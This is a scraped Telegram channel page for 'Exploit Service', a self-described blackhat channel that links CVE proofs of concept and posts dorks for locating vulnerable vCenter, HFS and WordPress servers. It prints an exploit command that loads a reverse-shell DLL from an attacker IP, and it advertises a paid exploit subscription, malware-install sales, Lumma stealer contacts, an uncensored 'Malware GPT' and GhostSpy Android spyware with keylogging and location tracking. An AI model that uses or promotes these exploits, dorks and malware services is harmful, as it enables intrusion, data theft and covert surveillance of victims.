Exploit Service
Yopiq kanal
Exploit Service | BlackHat ZERO DAY'S EXPLOITS Everything is published for informational purposes only. Link: @exploitservice Private: @ExploitServiceBot Exploit Developers: @ExploitDevs All Projects: @MalwareLinks Escrow: @MalwareEscrow
Ko'proq ko'rsatish8 675
Obunachilar
Ma'lumot yo'q24 soatlar
-497 kunlar
-20030 kunlar
Postlar arxiv
8 675
Finding Hidden Parameter & Potential XSS with Arjun + KXSS
arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss
Project: @ExploitService
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks8 675
Bypass-Four03 is a powerful bash tool designed to help testers bypass HTTP 403 forbidden errors through various path and header manipulation techniques. It also includes fuzzing for HTTP methods and protocol versions, making it a versatile addition to any web security researcher's toolkit.
https://github.com/nazmul-ethi/Bypass-Four03
Project: @ExploitService
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
8 675
Launch of the new Malware GPT project
Follow the news:
t.me/MalwareGPT
and also the folder has been updated https://t.me/addlist/dvHVtK0vSIRhNjM0
8 675
Repost from Malware GPT
Launch Date: TODAY WITHIN 2 HOURS WITH A LIVE DEMO VIDEO IF YOU WANT TO SEE ANY PROMPTS IN THE VIDEO SEND THEM TO @MalwareGPT_Support
Malware GPT V1 own development without censorship
Link: @MalwareGPT
All Projects: @MalwareLinks
8 675
CVE-2024-38812, -38813: Two vulnerabilities in VMware vCenter, 7.5 - 9.8 rating
Heap overflow and privilege escalation vulns on unpatched servers allow attackers to easily perform RCE using a specially crafted network packet.
Link: https://nt.ls/44tRg
Dork: http.title:"ID_VC_Welcome" OR certificate.issuer.domain_component:"vsphere"
Vendor's advisory: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
Project: @ExploitService
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
8 675
PALPATINE INSTALL BOT ⚡️
SERVICE INSTALLS 🖥️
7 streams, the price is for 1000 installations
🌏 Mix World - 130$ (Average quality)
🇪🇺 EU - 630$ (min 500 install)
🇺🇸USA - 2100$ (min 300 install)
🌏 MIX WORLD UNIQUE + Т1 - 1450$ (rtb advertising) (min 1000 install)
🇪🇺 EU UNIQUE - 3600 (min 500 install)
🇺🇸USA UNIQUE - 9500$ install (min 100 install)
🇨🇦Canada - 10200$ (min 100 install)
⚙️Telegram Bot: @PALPATINEINSTALL_BOT
💬Support: @seevpalpadin
📰Channel: https://t.me/sheevpalpatineinstalls
☑️Reviews: https://zelenka.guru/threads/2096719/
https://forum.exploit.in/topic/234699/
https://coockie.pro/threads/servis-prodazhi-installov-services-install-mix-eu-usa.2500/
https://bhf.ee/threads/643449/
8 675
CVE-2024-23692:Unauthenticated RCE Flaw in Rejetto HTTP File Server
New PoC:https://github.com/verylazytech/CVE-2024-23692
Dork:
HUNTER: web.body="HttpFileServer"&&header.server=="HFS 2.3m"
Project: @ExploitService
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
8 675
Exploit for Windows Kernel-Mode Driver Elevation of Privilege Flaw (CVE-2024-35250)
Project: @ExploitService
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
8 675
❗️В связи с участившимися блокировками в Telegram и недавнему сносу канала Meduza Corp, а также риском блокировки аккаунта, сохраняйте наши контакты в Tox, Session и Jabber, где вы можете связаться с нами:
📞New Telegram channel: @MeduzaNewz
📞Support: @meduzza_support
📞Jabber:
meduza@jabbim.com
📞Tox: 3BD363B76536440EB9019BCAC61200579D94CD2301F15C43F8FFBF06C3CE1F3A45CA30C87ED8
📞Session: 0588da0bfbf37b2345e8fcf4fb5c183268cfbe13b2b61e1ba34a30c1362425ea7c8 675
Sekai Ctf Windows Kernel вызов Process Flipper
https://nu1lptr0.github.io/2024/10/10/windows-kernel-challenge-process-flipper.html
Project: @ExploitService
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
8 675
#exploit
1. CVE-2024-20404:
Cisco Finesse Web-Based Management Interface XSS/SSRF
https://github.com/AbdElRahmanEzzat1995/CVE-2024-20404
2. CVE-2024-30052:
Exploiting Visual Studio via dump files
https://ynwarcs.github.io/exploiting-vs-dump-files
3. CVE-2024-20353:
Cisco IOS XE DoS
https://github.com/codeb0ss/CVE-2024-20353-PoC
Project: @ExploitService
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
8 675
Attacking on #EDR
Part 1: https://her0ness.github.io/2023-08-03-c2-Attacking-an-EDR-Part-1
Part 2: https://her0ness.github.io/2023-09-14-Attacking-an-EDR-Part-2
Part 3: https://her0ness.github.io/2023-11-07-Attacking-an-EDR-Part-3
Project: @ExploitService
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
8 675
RU 🇷🇺
Внимание! Public Telegram канал и чат нашего сервиса были заблокированы.
Актуальные линки:
Канал - t.me/LummaReborn
Чат - t.me/LummaTeam_Reborn
Селлер - t.me/lummaseller127
Багс - t.me/lummanowork
Маркет - t.me/lummamarketbot
EN 🇬🇧
Attention! Public Telegram channel and chat of our service were blocked.
Actual links:
Channel - t.me/LummaReborn
Chat - t.me/LummaTeam_Reborn
Seller - t.me/lummaseller127
Bugs - t.me/lummanowork
Market - t.me/lummamarketbot
8 675
#CVE Repository Hunt
https://github.com/blackhuntop/Ghost-Cve
Project: @ExploitService
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
8 675
pdf exploit
https://github.com/rzte/pdf-exploit
Project: @ExploitService
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
8 675
all
python3 CVE-2024-38077-EXP.py --evil_ip 103xxxx --evil_dll_path \1\reverse-shell.dll --target_ip 1xxx
--------------------------------------------------------------------------------
MadLicense: Windows Remote Desktop Licensing Service Preauth RCE
target_ip: 1xxx
evil_ip: 1xxxxx
evil_dll_path: \\10xxx1reverse-shell.dll
check_vuln_exist: False
--------------------------------------------------------------------------------
[*] Run exploit script for 1 / 3 times
[+] Get Server version: 0x60000a04
[-] Crashed, waiting for the service to restart, need 210 seconds...
8 675
#CVE-2024-38077 #Windows Remote Desktop Licensing(#RDL)Service
https://github.com/CloudCrowSec001/CVE-2024-38077-POC
Project: @ExploitService
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
8 675
#WordPress #GiveWP POP to RCE (#CVE-2024-5932 CVSS 10)
The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.
POC: https://github.com/EQSTSeminar/CVE-2024-5932
Search Query:
HUNTER: web.body="/wp-content/plugins/give"
Project: @ExploitService
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
8 675
Private channel from @ExploitService (@ExploitAlert)
By subscribing, you get access to the private channel where you will find:
- Exploit packs
- Manuals and courses on exploit development
- Daily publications of new vulnerabilities and instructions on how to use them
- Macros
- Silent vulnerabilities for PDF, DOC, XLS, PPT Office
- Multi-exploit builder
- SS7 attacks
- Modified and custom versions, POC
- Exploit development for Windows, Linux, and more
- Binary exploits with Python
- Daily video demonstrations on exploiting new vulnerabilities
- And much more interesting and useful for exploiting vulnerabilities
Subscription cost to the private channel:
- Weekly: $649
- Monthly: $1299
- Lifetime: $1990
Accepted cryptocurrencies: Bitcoin, Ethereum, Litecoin, Monero, Dash, Zcash, and Tether USDT (bep20, trc20, erc20, ton).
You can gain access to the private channel through the bot @ExploitServiceBot
8 675
👻 GhostSpy Android Web Control
Key Features:
• Remote screen and precise command control (Skeleton Control)
• Live & offline keylogger for tracking keystrokes
• Privacy mode with a black screen for discreet monitoring
• Access photo gallery, SMS, call logs, contacts, and installed apps
• Remote file manager and real-time location tracking
• You can find a full description of the functions here
Special Features:
• Resistant to removal, undetectable by Play Protect
• Automatic permissions setup
Compatibility: Android 8–15
Easy Control: Accessible from any device with a browser
No Setup Required: Register and start instantly
Daily Updates: Request new features anytime
Channel with updates: t.me/brazillianspy
Pricing policy: t.me/brazillianspy/101
Contact: @ghostspyvip
Ready to cooperate with any reputable escrow service including @MalwareEscrow
